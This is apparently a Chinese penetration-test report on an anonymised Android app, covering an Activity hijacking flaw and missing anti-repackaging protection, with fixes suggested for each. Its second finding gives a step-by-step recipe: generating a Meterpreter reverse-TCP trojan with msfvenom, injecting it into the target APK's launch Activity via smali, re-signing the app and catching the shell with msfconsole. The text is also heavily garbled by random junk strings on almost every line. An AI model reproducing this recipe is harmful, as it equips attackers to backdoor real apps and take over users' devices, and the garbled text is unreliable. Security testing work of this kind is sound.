0 l$ x) p6 _" ^5 |5 |- b: b1 c
! t6 x, z$ {: k7 C1 m. p& G
4 M# g) R( H( [ J
) R4 _" x8 a1 |4 d
$ H. t( P5 M: _. q/ c% t- p: N/ h3 a$ Z* @
5 O7 P* B1 U8 e+ q( z
7 L0 K9 \& a) p6 h, @& e
表1-2 测试结果
5 n F' q2 [( d4 s4 `' Z/ {" @) e
, Y% @' Y" f: ]% Y
* M# o* O# O. u* s0 z t: h) M8 w # a5 z2 Y+ \# }. P
+ h" @- t; u$ ^
1 z/ U V; F o/ f
5 J% R) E0 V: ~
. z" C0 i J7 J- F8 K" `, u6 [4 p' n" k( L5 R( f" u1 i
6 l2 k3 m/ @8 B3 ?* s" K! z
' i5 b+ n. T5 K4 x. s, B8 k3 Y* ^
2 检测结果
+ P6 ~) y- P8 |6 n% ~' p8 v. W
$ e$ h/ F2 H" K9 T! n) w+ ] W
) b% W! c- s" P8 e& d9 R
; L- t) e7 v: ?/ }. f
/ h1 @. t5 ?2 R5 b: z
$ P) w. n7 u) T5 R* b4 ` 2.1 某某某 , q1 p! k; a% H' E4 p% W
5 g3 X' }3 [+ W9 f
# P1 w: Q+ }0 H+ ^, P
6 [7 v# M6 H% f+ i
( R) a2 I H+ ?( k- M) v- ?1 N" W
( z7 O6 ~' P% r# r8 x U) w 2.1.1检测目标
2 c7 U) |. U T9 s9 F
7 p) o0 k$ i/ `. C, K, v
7 Q. ` Q9 S- R9 Y' Y3 h4 X
& w P: S* S$ ^5 ^# n* g$ m8 W
2 r, x7 K8 C1 `
3 ?/ U Q* O+ s/ [ I+ O4 f 目标地址: 某某某某某某APP 0 p( {4 {& M0 a1 A
% o. x4 R7 |# K& e* M
! g, k2 z) o+ [
" h8 `! m0 |6 Y' d6 y
- J# G: l3 [, F9 [$ N
3 b! Z8 H2 l. V 2.1.2检测结果
9 _; M0 K4 |, c
# m3 i0 r" W( S1 V/ Q( v# O9 `
7 a; {, m% v: Z; |
' [2 d- ~: [( g7 X) E7 } 7 c; H" r% v* m! R: _" N
9 i% G( c3 g4 q( p3 i" N$ i+ v% E 2.1.2.1
5 o( O# M# k$ N4 @8 E( m# m0 X- s
; V% t$ _! P- j( P7 y0 W, b
- L, C( o- R) D v' E
" U f0 o* I/ O) D3 a, n# Q3 N - P7 Q" T$ Y( k+ b0 B, U
" k" y8 X; ]& {$ b) j8 L 漏洞链接地址:某某某某某某APP $ Y% l2 D/ q: o Y
# M g+ g! n$ \: [7 H
. q3 H. U' n$ ?" ]7 r$ B
/ y8 D' _2 k9 S
; T$ g) W4 i$ B8 U1 s; l5 L# ^( f! o# D) J- }* C' ^$ w
5 p ^! A/ ?: _- V6 _) s' T. j
8 d0 P& ]: D6 |8 r1 D
' B2 y$ H. q0 {; C* \
9 m& G9 D6 \- Y: t 8 W$ ^3 P3 J% l) v
- U d z8 I( \9 I& \1 C
漏洞分析及取证: & j- B9 z0 g" j( j% V) W8 V
9 k n0 H- K |/ C5 _6 C! f% ]
+ Q/ C. M: l) O0 ~3 U: t8 v+ [& ^' n5 ` |- \/ k1 _" h, S3 o
1 k0 O/ p' [: S; f. V- y1 C1 G
2 N) J# d" Y9 u! I9 H! A* ?; O 通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - Y' | \# h: ~+ ^! \5 r
* l; w9 O, |# M6 Z" r/ f/ x" ]
( R* V& S4 U8 f8 R
, M: ~1 t) n8 v b) h! Q0 |# j) `# A
Y R* C% m% h7 Y# `, z
: H! p! ?) `6 `+ O G0 d3 m7 Y$ ?7 i7 a9 v8 G$ F+ Q; o
1 S% G) m0 b* _( K# k/ e1 T/ Q, X7 k$ R+ |2 q. N# s5 q: g* D
- a$ r, K9 d* v M
/ W: \9 @% D' _) Y
' R6 n4 e9 a/ w! w" O0 I# I! R* @: v: w# z9 ]! c2 [8 Q
0 J- v: ^/ f: T1 ]9 N' k
: {3 F7 }9 K% y+ m 7 C. D2 d1 l* V j* P( v6 r
% q! r* d9 T. b. O' n7 u$ I5 r. Q
. ]+ G$ @) ?* T# R9 z# |4 k
. t/ F- N1 `, n S
# O& |7 `0 n0 R; r0 a T1 H" y* u1 l' p! {. ~
; M0 A+ [5 Q; x
: \( A% l K$ c# L3 _
3 m; U( @- H2 E; v3 U+ h$ }! f0 d2 v
. X8 a; E4 t; C, o0 e
+ g0 V! C# ^0 _3 a9 [4 b+ x" q! V5 D# M# C, l* B# d/ W" l
. {0 Z2 u. g! D2 y% S. V% Q" M
. }1 t3 s4 Y3 A' @3 f d 5 m+ L5 t1 T9 C* \
2 N" V- b/ n( P' f% K
7 a i$ }( v+ I- {: [0 I0 G
5 n: \& |1 ?& g5 q , c$ H' K% K% u2 l v3 t! e) e
+ z/ c) l2 w; o* b
漏洞危害:高
4 _6 W! N# g3 t; }; u+ p
0 t! @/ M8 M: r! |7 T- T$ X2 y
! f+ D' x/ I; h! n8 m& }$ B* @: q2 m
3 w6 {, ]7 l- Q- h) B
# W' ]+ b3 N' z( [2 t5 s5 y, R
7 ?7 _. W- W3 J+ ~# o9 N, P- i" M5 C4 f2 K! d
6 T6 w( R* l% V" {$ H; h& ?; N) _ s6 j7 |4 Q
: N' @! @3 \( g$ Q1 w1 w
1 g" n$ I H+ V, H: W
' \" @/ z$ Q: p. ~
2 W9 C: u9 G' l$ b l& N, [ ) u9 c f/ i' u2 C* U" w
" Z) \$ I2 z$ x
严重程度 ! `% C6 X# F& M; P3 ~- {% O
1 ~+ d( n8 n6 U4 j
+ m4 x. \5 u& a% S
0 W. S+ t, c$ w; v' u
| % z& p* A. o# S: g' C, U3 }3 @; b; r9 U
; P, x9 p3 j& [: ]% f( J' v, q
1 e9 l0 W% p5 ? o* \" n6 A2 L3 ^: e+ N8 } ^
2 Y. F' p5 q7 f- e0 s( y
, I" A$ f: u5 _8 N# E0 S. m 高 . W4 i4 ~# Z' y- {4 c
g6 P2 P( y" E E I$ l7 e* ?
+ K# |4 D* }3 W L6 m; r
4 P# ]3 ^4 @* l# z |
8 A. l) E- D7 l7 l0 B }$ b& g5 S0 O' h: D
P" W9 n5 J+ \5 E# O* t
3 W3 G+ X3 v2 I2 E* e
/ Q) `' U9 [' B, p/ c3 d# [+ A( L1 |$ {9 p) z7 _" O
■ 2 t. ^- D+ z9 k
% l. j T' O# I- k7 |3 {: a
f/ I# |; J# }2 A: l. D3 T1 s! ?
|
% Y2 O1 y% N9 E0 N c) `( [
" e" B8 R/ v n& Q( F & p" i7 E# h$ q6 l) x/ t& h3 X
a" F0 b* i- o0 Q
( D, V. B: `3 C' t8 f# ^7 a
b' Q( P# L- H+ r 中
& b$ @( _& ^% {* H! w7 ]4 I' Z7 N) a- r/ V2 {* D
. ?* L- D" ]7 C9 Y6 X( o$ t
* l* ]9 o8 {; }! S$ Q; `* _ | " k# \4 Z" ^4 s+ Y
E" E) s1 g, {* Z r
`8 c# K# ~- L; m& q, D9 t+ a, A5 }# z
& Z' N3 V2 z G; }
& @( Z& ~3 j0 W2 J
S9 I s0 e" w2 D
& H2 o* R# J+ z% |1 A9 U- B
) u- c. O- P% x" T. z+ f( S* E% u' o" h5 J8 }+ _0 D
|
' g- {8 c# l. H0 C' m Y, L' P: \. T' ^4 {# ~
, L$ C5 A$ e9 W
; n# C) d( T" [2 W- K. u6 k Q, C % E" g) J$ V$ q, I! {
& c" l4 \5 u% j0 \; F) o% o* v
低 ( x6 i& R F& q( ?
5 L/ ~4 M3 \. U+ F
0 o4 Y9 t. i4 M7 ^& f. C' R3 p
$ H) L) S [, @+ s4 F) k# r: T | $ |- W; |% R3 D- C2 d
) e# b) n' a7 V1 y2 ?( t. |
4 z Q/ {3 R5 @7 R3 u; j- ]; Y/ t9 \( Y0 A( w
9 o6 N4 V- K2 `1 [1 K
, Z' J# t: t. A7 |
9 b; V! Z; D9 t! V
* e7 ]) R+ x# k0 c8 h! P3 U, M* { $ k% r8 L' c+ A/ A
& W1 ]) }" e+ n4 t0 Z5 r. L
| m3 |* r1 E: x
0 ]3 k, ^/ p+ s$ Q
7 P' N/ r: k: l, j8 D0 c4 G9 ~4 l
2 M& `. u2 V& F9 J
! ^; ?+ D6 B$ ]! w! T4 E8 b, e4 a/ r6 [
; r& J$ A, B( H( V; H- B
# F! [# B& }5 j% x) b # {4 ?; {9 d3 H
3 h3 z1 z- v" e& z1 P 6 `9 s" t& S* a4 B* g
B) X0 ~; O2 N0 ~
8 n* q8 _ v) t4 I& N) o" R7 ~" I2 V' a- e
, v9 b9 j. d/ n" ^) |8 @# n8 D
* R. |: m- ~8 r2 Y( ~ N# I: H5 S/ t' Y% h/ _* }& v
* V0 ~& n4 F! l* ]+ X K2 c, v 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。
- X: K$ y! L. d( H- D3 W; C: Y0 A
5 H) u& e, }- d
8 m/ |- Q2 s$ X2 U2 |% e6 u
1 g! z4 M! L( }% _
" T$ {, R# m; }% X" d' q/ B B/ w2 i4 Y
}' l) ^9 P5 g8 K
. J, Y8 ?2 J! S c7 J" \" S
3 b) }& F* n2 P) r" E) H/ m4 [" {/ _9 H' m0 k
5 ^* W4 \2 o, G1 G( K( f, N3 W
/ m6 U* x; b' ]5 Y& }) D$ ]
: Y" a, r0 B( o; [' J, X. L( [, F/ A$ B2 l
1 _8 r$ ~. O1 B
3 X/ l- X% W2 v, V: e0 A4 R 3 _; a% \5 R; E$ ]
) Z7 b- i' ~! W+ m 2.1.2.2
6 y ~9 J% y+ p8 z c; P, y3 e; C. [8 V/ V/ W$ ^ S* N
! \3 `2 ]) e+ J4 B& l5 p
& E- t; ~- s4 X* `. O 6 I$ }, s- p. a7 a. n4 i
2 C; [. u, `$ S' z2 h
漏洞链接地址:某某某某某某APP
" J) z" E# T1 O7 J# v3 {, @ `7 q1 c& `$ }+ Q
) _% S$ N5 q# J+ G$ |, i
6 o" E }1 } H `4 D! t$ j. Y
% H/ p: ^2 W* }. z2 u7 T7 I1 y" d$ e- a& h ~* K. S+ E% X
漏洞分析及取证: 5 W; s% V2 \1 U, _4 y/ ]
6 r2 P* q% [( `4 ]( w3 ?) o n
2 ]. h- e* b6 H O! v# d+ m( `8 r2 i6 W/ d! p6 h& E
; r9 D# Q! V! H- c1 S( y" A, h& C
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
# z( I3 Q! l: `2 a2 M6 P7 |
3 u: `% Y7 f: i1 h6 M3 s
3 B; k* m# A9 O8 R, v0 ^
3 l" T. Y1 p( v- |" @
% x; d9 `& g3 q/ o' [/ q c
5 E4 [1 J' k& g 用Metasploit 生成木马 apk
7 A9 @3 Y4 b+ x( Y& z: d9 s; I* u' f' ]' L* L
6 n3 g! o0 `) k* q2 Y
( B1 K, t4 r6 J1 i! @# c5 U2 q5 H
7 C8 X- l# o' f+ S5 w% j. _
6 q: n3 [4 p- ~( X8 `, c* B2 A) v/ s msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk
$ D% \: q% ?- J0 X
0 A( E% P0 n7 |$ v. p7 V
* r8 h& ^* K$ G% G* C# d" [' l) j# U- ~& j* K% K
8 J" _0 U8 }$ F/ V' P" u S
% J3 s0 N6 }9 ]1 x# v: b
反编译目标apk和木马apk
0 j9 W$ m% y6 I' n, N& m# V e0 _0 g
! e* W# `! W0 R5 A" u6 ]: u5 k$ g2 j' Q: v, P& l7 x+ V
9 Q4 k6 Z/ K" W
" W& F! ?! n, b) ? apktool d target.apk
! z) ~" C' f4 _3 A$ X4 T; h
; @" R8 W1 A8 r! e/ h6 g apktool d cockhorse.apk / @3 D7 R, f: k7 y+ b& E0 X
. M( E4 c. V) p5 ~# a
d, p0 V- {# ^2 F5 D! X
y: a7 l, N5 P6 H
' @0 E" f" }; J+ i. t7 ~3 J: R3 Z$ p5 Z( P% Y$ G( P& o
木马 apk 注入目标 apk 7 k9 q/ R- n0 f2 j. K0 }7 H
+ r6 Q9 P' u$ B; W* @3 D
5 K: W H( k! F/ p- [# ?
) \9 V. G. h& ]& }. V+ g
* K) ?9 Z" f5 o$ y3 u
) O: q+ U& H# I3 {: S) ~ 在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
" k# x, _, @' N3 w; l
7 G% m, a$ ?6 ~$ k: @2 r! a/ p5 K
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
- t& K6 D; j3 d
) o$ {3 V6 M% K+ v+ ]8 Q
; Z$ I8 {; c0 P2 k# Q; }
* I0 k, g2 U; ^: Z- Z/ c l
) k( h4 c# `( Q' p
4 q. w* `2 V/ o# W 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
% X4 g+ U4 [$ O" Q& }- t# ]4 R4 P& l, J+ ?- o
4 o- f2 t: ^4 C4 M4 O2 Z
/ @$ M& c/ g1 l" l : |* ?, O2 M l) u( d
+ w# D0 f0 H8 x( y" n3 ?, M" b, D 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下
$ k& O8 q: N2 E2 N2 A- ?% H. }' n: P! B! w* l1 P4 @
# \/ ~$ p1 q6 w; @# f
# X. X) p1 M" k/ p
; X. K9 N9 u a# p) Z! w
6 M0 K- J! H4 m' C& M 回编译生成最终 apk
/ U! l* x) t, h# F" m
1 [- T% U0 W7 @+ T! ?
1 \# s! l: q" E8 O( Z; i1 ~0 W2 R
& H; G% |- T4 f z+ x6 C
% _( X% L' {0 {1 I6 q7 d& z9 q9 a! D) `/ m' z
重新打包
* e+ q$ U+ |9 { C- r2 X
9 W* `# O5 m* U* s; [
# @$ ^4 g0 k; x" u# E8 V8 F: Z N( |
8 `( u* ~6 n, N) C' @
( V/ }8 K7 U. T" a. n
# i6 Q H- B9 [2 Z* A$ G" Z$ p+ p apktool b -o repackage.apk target_app_floder
9 Y3 A. E/ `& F3 I) U; i
$ K: H3 H* W+ R3 }4 Z* M! a
: H+ m; S( f4 |6 U, o0 [& |' p7 Y. q; F7 Y, W- H3 C4 u
6 L, N# I% M2 t0 V5 X4 d
- ~3 Y8 F/ h9 ~: f% r- D6 A
创建签名文件,有的话可忽略此步骤 6 L! i; Y6 y. M& w, I
, l$ g2 V6 v) h8 ~6 A7 U
" r: f/ s4 }& F7 @8 G/ ^% {- ^" X. \" N0 c9 J' G1 U
; j3 @5 t& h1 q) G7 p2 _9 g, r$ u2 B; ?3 m
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000 9 ?' ]" @" i; W1 s' D0 j
* v& k2 {5 n. u) [! u
1 S! B% a$ p2 i' s, Z) U
8 p/ P: [1 z1 m
5 r+ J% j. G, Z
. |. @4 D! p: F/ c i4 Y 签名,以下任选其一
7 {/ q+ x4 s; r* l! g$ F1 }. Z, A! p. D. M: b% s. N
8 w1 `, B, c- s* E0 {: M0 ?5 ?4 E8 K* i) ^0 [
a/ s2 }3 M* v, h. p
# N& ?# m2 x" M; A' d, d jarsigner 方式
. a6 g3 J$ \9 F; r* y1 V [ m2 K* P
3 l. a, P }# q0 L5 [+ ?- y
" S- z2 d# T; r! V
2 o' i4 y) K, H. I! L2 |% x& L' w5 n: z" o' y
jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname
4 l8 S" t) a+ U4 B# u0 R
" n, q6 r1 d# f* t6 \+ U/ m a* f
/ h) c* c7 S8 f" P% z s
$ j1 z) q- H' ~9 H2 L3 w5 J! l 0 o. x9 I M/ T5 B3 ~# u$ N
; W2 B! t$ h/ B; c6 E. V( }4 n0 \
apksigner 方式
7 J: g$ h. Q, b2 E
! w. ]; H( v3 M& d, q- m
; f6 t/ ]9 b* `8 }# b4 I+ b
* R Z6 O0 B& `$ Q% G6 S5 w: M
+ j2 P0 p. p0 M k' m9 Q! D* L6 M0 n) c9 l/ L& n: s: p1 r7 r
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
# t1 p! X* C' X I+ n" C
/ b( {( l! i$ S2 o( a
Z) m! j5 p! E3 N
. w7 c: P6 |/ }) c7 G; J, P1 i
. h0 B S. C1 P( B/ C; g
& O* b: @+ H, {, W* t T9 Z 如需要禁用 v2签名 添加选项--v2-signing-enabled false
9 `: A2 e! K- P8 T2 Q
* y" j8 N+ p& N8 ]
. }$ L: }/ H0 Y h; ]8 a$ e [/ L" n z$ C
/ B# _, g. X. ]. s( C
, o* b9 i7 R9 _9 p9 g
验证,以下任选其一
; I; y2 ^7 F; B1 g
3 ]4 o; }- p& j7 Y( K& H
+ l" i. X& s" O9 x; F6 N, u6 s
# _6 g: {) Y/ n4 c/ ^. x4 p 3 ~4 k+ n: k2 }
+ t1 v0 Q8 `8 E/ v: [2 g6 @ jarsigner方式 6 s2 Q' @- B# ]# d# ]. I
* n' Q0 S! P0 `/ z- c# {
; O% U5 I# e& H5 Y ^& a
% Y9 v- ?: J0 x6 _
& ]! M+ N' r) c4 B$ _7 {1 t( S1 Z
" o( Q6 F& v. @& X& s0 h# V: X jarsigner -verify repackaged.apk * j/ ~5 l3 M U; i, s, w R
4 M* z) H3 s- h3 ~
3 [; _2 c( I Q1 k9 R) w# Q% d! W" j! a3 j
; Y6 g" ~0 Q( k$ Y
* L) D$ i) g0 a apksigner 方式
}6 p8 n( B1 ]5 p5 f' y0 K/ u7 z) `9 C) \1 K0 V$ J% l3 E- E
5 m6 _8 U7 f o
. o9 Q' _, H/ w # q4 X" t) }3 l J
) L; N8 I0 y6 u2 ^+ {: Z: @
apksigner verify -v --print-certs repackaged.apk ( M6 i* r2 o, n Y: m# X
, i3 z1 A9 \" _7 _6 j
7 ~# e7 u. W5 a3 U( q6 u! w5 H- n5 j y P7 D
* Q* e3 M1 }4 ]6 C P# Z3 ~) s, {1 T8 K$ O; V/ q( Y
keytool方式
# F* l" y8 { c) ]' A( V6 d2 g4 A1 I% ^
' ]% F8 b" m# d2 K
! H6 s$ Q6 W& S! c8 y" T " O. w# z4 r, \* [3 d$ \
9 j1 W9 V9 ]( S keytool -printcert -jarfile repackaged.apk
/ C8 C* g5 F5 [5 S* y8 s0 y7 Q: d1 r% t' r) u
1 b% P" Y6 c8 t
4 S$ K" R% i; U2 P( X8 I3 Q
6 L+ ~# B4 @0 F
" t O. f, {6 E" c" p B 对齐
- k0 Z4 p" ]' p: j( S) u( v, x: b' ?4 V( }" l
4 W* e; x$ S8 M; \2 T
" U i0 J. {0 F2 c
F4 m: U. A9 S3 M$ ], X! v4 R9 N1 u; O4 T+ v" C3 A
字节对齐优化 ! u. _. V* {! q/ @# r) u: Q
) K/ \# ]/ e' c1 K
5 E' }* m8 ? W+ v+ J9 [: G* c
5 a% q% B4 H8 Z2 R5 t! W & v: a) V$ [9 o$ T7 F
7 `4 f; y4 ^7 t zipalign -v 4 repackaged.apk final.apk
4 `. Z6 a- _3 Y3 M! B' D- R3 N3 }6 h+ D6 \+ Y9 d& q
9 o/ S7 x- {' o
- B" ~+ F$ }$ ]; l- p1 r
0 f, ?- u5 ^2 i& O- K7 W9 O7 H% Q. s2 r1 f$ i
检查是否对齐
" j0 f' Y4 ]' O2 p' H7 V& N0 T) O! j0 P7 t
5 w) j' I: ~" L- ~2 J( E
4 }- A; B! U/ Q$ e5 b2 b1 N) q
# k2 c1 I+ K3 S' L( F7 n) g7 ?" Q" k* e3 h" c ^5 ]
zipalign -c -v 4 final.apk : D8 Y- @ g' h) V C2 d
/ N( l( ?3 f2 }& t: o; U- i' r: B
9 N* i9 F( |, z0 @
0 n3 X% U* G# w
6 Z) m/ v( u f) b! l7 u
: q$ G; C5 ]: {8 m5 X; V* q/ m* d 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行
0 L5 Y2 {" J7 D! Q G& }6 K- b1 u
& a" C+ z2 n5 V( d
- n4 h' w" o9 v
( |8 p" ]( @7 B5 t! `! e/ I- `
( ~3 _/ A1 H: }$ r% f6 `& C0 F- f
启动Metasploit控制台,配置参数等待上线 5 Z- C' V0 N* u; k( j. i
. g! d2 `4 i' g- S5 ^/ a
! a7 N6 {" k& ]
9 U5 W1 E' F) X k( p5 T
1 Q& r( w6 D% p- O
3 Z. r) S6 Y) R0 @5 [) X 在终端依次输入如下命令 7 x% k: g% W8 a) s3 C8 @
& l8 L* h3 \& ?1 i- \
& L2 c$ Q! |/ k2 j
& H) U/ O/ ]1 s5 _. m
7 N. J; j+ p0 L' a/ i7 F
) y4 ` P/ Z! @7 @% P1 g* r msfconsole 6 E* Z! _$ F4 F! j% e4 W
9 v, \' G8 O5 @7 L3 K8 p8 F
4 @, J$ m) @5 u( I0 X( Y& |& I$ A/ @
! n; u3 C% \/ Q ; h1 C& v) W' R; J( s' d
- n" u4 t2 O$ F& z# L; v
use exploit/multi/handler
( }! W: Q' h# r7 _+ s& B+ g
( O1 A1 V9 H- i2 p7 `
7 h. @4 B6 ]! `1 M( p, E$ M2 h' ]$ Q" T x2 k
& y k( t" `$ m) w, \# Y
4 m+ x9 R8 U K- ^: a set PAYLOAD android/meterpreter/reverse_tcp 3 [) C% T& s2 Z% B9 }5 h M( l
& T$ y; [! N7 v% f1 x5 H3 z
7 Q* w) b' l$ Q' d
' ^* d' |6 g/ D* Z* ~* `
/ Z- p; Q" Y0 X6 V" q
" V* I2 Z3 [7 Q set LHOST 192.xxx.xx.xx + B- H" }' ~! g
- {9 u5 u" V5 m# I8 r
# E z" k' n5 S! {& Y8 H% T
+ G2 {1 U l) }( g" X! s
; _3 `7 S$ s a+ Q8 {
2 R: ~: ^% B) i- q5 m/ T set LPORT 4444 1 O ^7 r. L3 R7 W
* t+ \6 C; w7 e% l
% s" e8 E; B0 ?$ p/ q
) U1 K1 |- j+ w/ J+ n7 h/ {! V 2 g l8 R; E4 L' i
1 C z4 ?2 K' l, f V
exploit 0 g3 l8 b% n* ]
/ Q. ?' W) ?9 @: c5 j% F
* P! z# j T3 N. d( }0 q* ] _2 k
3 ?7 I& A: l. {. {
) E- J1 r7 v2 I3 { 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:
" H+ ?; B% v/ r/ E' \! m% ~4 f5 ~0 b; H: D8 K3 j) w- ^
; M; j9 Z% z* ]" A& y1 A/ Y u
- z, T+ T% ~6 r
r2 L1 m- ]: C! V# y/ K; y8 g) t* O7 g, ^
漏洞危害:中
4 x* M( e3 D7 z6 D, r; q0 {* Q6 R# V: e6 {, a5 N) W
' a1 r- }7 ~5 }# d* Q7 a4 J# m& ?/ r$ u, b
G% ~1 q; S( @& z1 L& v7 }
. n& c' v5 e$ J' x
" [2 T* B/ L; x$ I* u0 ]0 J X& ]) @% Z) G# i3 Q5 W7 ~2 R7 i* f! U' E
* Z0 S$ j9 a" R$ [- S) M
! C n K u6 Q W/ E
5 S! V# Y4 X# ?3 ^& ~: i1 D1 B; `. R |
! q& x$ A& L& }8 ] p- W
. V$ F7 `6 B3 {/ F0 {: Q( p
+ _/ p7 x0 f' Y. I% ~" t0 h6 M/ ?
* D6 p; S# v6 V" Z 1 @3 n1 M$ V: J
( p; @ _1 l, _0 Z1 t0 d4 ~ 严重程度 3 g8 T$ ]$ z+ e3 ~6 T* M. _
+ A8 T% U9 _1 d, w
+ S0 u0 d4 z# e8 E( \2 [
6 K }; j, L1 g9 u) x |
( S( \8 Z5 M) T7 u2 k$ ~- n4 D* }% n6 L/ r* c s
% o9 ]- X7 K; H$ t! [4 @- J( d, |5 M1 a* `2 [" {) J3 D1 a
, k X$ _4 P% L$ S, K" ?% E4 m" `4 t' N) h6 m
高
( w! {, ]4 [* L3 H$ e' E( N+ z* N8 G2 H. x
1 D5 l3 h+ Z+ n, M0 a
5 D+ v, \( F+ g: X8 g5 b, c1 w | 2 ]. R4 K$ n4 z$ `
3 I) m$ o4 n8 Y* ]1 x4 Y' c
! G0 `9 r3 U' r" j, s( G0 y5 z* G. R( Q" d; Q' d! M$ B
5 r7 g( E5 `3 ?9 m
* s- Z5 D; H1 L% ]0 ~# L ■ " e3 b! z/ D) _* M3 L- o
( [3 i. k3 x, P
7 ^* \3 r+ B M
1 S6 l9 W; V+ {* [) J' }; w
|
6 z* z1 S4 `+ [& s. Z: H! X
' ~" V- Z B" p5 T( ] ! b; }& L; X6 Q( M) Y; y
, X3 r7 H5 u9 J
' j$ a. ^3 ]6 H) [5 E% E4 G. M, c. }
中 + l' t. o6 S3 ~$ ~9 C/ L4 ?
' h6 {# R+ I9 i
, ?* e" X+ A" [8 ?' \' ^; c* G# k2 M1 u) T9 N$ C
| - a( [8 x; R/ h1 h3 y/ C& k# \ r
& j, W# H6 z. q7 e) n8 F
5 A6 T0 Q* q, t* i) b" z
8 F/ @& Z. H6 Z : I$ G ~0 `7 {7 d [
- I8 U2 V9 ]$ H* _( M; ~4 h8 {7 d
+ Y* E% \4 {/ p8 x. B# f# G+ D
6 _0 p' q1 ]: n
( x* k5 F5 g6 d v) e2 m- y/ q( t* c0 ]
' m4 @9 ?: f$ d$ v) n4 r l1 l7 u e% }- u) G' I3 H
|
& h. b$ ~ A. c
. W& g6 H2 F+ Y9 R! C& y8 v4 H 1 P# l0 e: x2 V( y8 Z. e; m& u
4 l' C( O4 ?% b9 I+ M, w2 i
% u7 J" Q( X: K3 j3 r1 @
& n: i t0 L. f" A6 O$ ?( r( ^0 ?. r+ ? 低 1 k) ?# @. {1 q& q$ t/ `
6 c/ p" H' w% }# m ' E' Z- R6 b! P8 b! A1 c
' P; B7 ]3 P, P8 W6 `: ^2 ^ |
8 Y5 z% K7 S, ~. S6 r# F% x
5 A6 H4 [7 ]& c
8 Q- i$ }, o5 F! |! S/ {: K8 D( t0 u/ u$ O
3 K. g' g+ q# Y* I1 H3 N6 Y3 o& C# s+ C! m
; T& P" Q$ r7 _0 X- K3 l: H$ D
9 v# U9 [ @, ?2 j. ] 6 x9 @/ p1 q& F0 z
; d* [2 K8 F5 Y1 H4 U- @2 O
# |3 K, v# E! n) B W
" G' W% S: S+ r6 b+ B, R+ Q! z |
p \1 k, H1 B; ]/ n; F+ b" ?3 R% a: i/ [/ D
6 C, n% ]4 p, O* u; ~2 Q y
8 s' g: D7 R# k+ [( t% [% d
G. h- h# X. u% ?6 N4 m
% E3 F* f+ w- u) I
' K- [3 _/ L; E/ s1 S& W+ o: g5 b$ d) a+ _4 q7 O
+ e- @4 q& U) q6 F3 @. J: c& I6 l) V& U& e
: X( Q7 |/ h+ x2 }9 o9 [& E3 ]9 T- t! w8 P- N$ R6 ~ }
" ]- A0 `2 Y! O Z; c4 t% A- R; F. J$ Q
# h5 v2 G0 H3 S# }
! f8 ~# [7 u3 E7 l- `
* N/ u& n9 o& A6 H, X4 b6 m9 \- I
! V) _' i' u8 r# h 修复方法:
3 f. X4 T" _" |9 E$ _% [' p; c% \
0 L& e# A' w# f. d! v1 Q$ T! j
# F) x1 j( y& }1 w( V
& H3 ]( n% Q8 G2 u7 F, G0 n3 r " }) V v6 y' e2 U
/ t# X) _% i! B6 `
1.在 APP 启动时应做签名校验防止二次打包。
! C1 d% z) Q) W8 T6 G# o9 V6 C7 v/ n
2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 2 ~ B/ I: D; X, q
, |/ P4 k3 M% l% t
) d; {/ P3 ~& Q) R: a+ J6 Z0 B
- A7 i" t# U* |5 H7 c1 I
# R; E2 d& d6 M& J* d u9 H& b& j: Y: y& }( Q _6 @, Z% |
8 N! D: Z/ |# \ C1 Y+ z0 p& X, ~, n& W" I' Q2 u" y
6 a! s' |8 ^5 s1 N, {
5 Y; o& T8 H, s2 X2 J3 f) v. W
: |2 `# I1 d& @1 \/ N( T/ x# \
0 D4 n& g7 ?" E
5 |7 {, V# q' u. q4 i" |5 o b- M/ N
1 M4 a5 ]' N' B' k& j1 i! d+ |' g
! U! O& n, I( c) y9 z3 O P3 i2 u( [2 J* x
) d- Q' X% q. o8 F+ R7 O
3 [1 d k7 a% P5 U. j* b( n
1 L+ `( z" R: Y
$ V @7 l& e7 I' \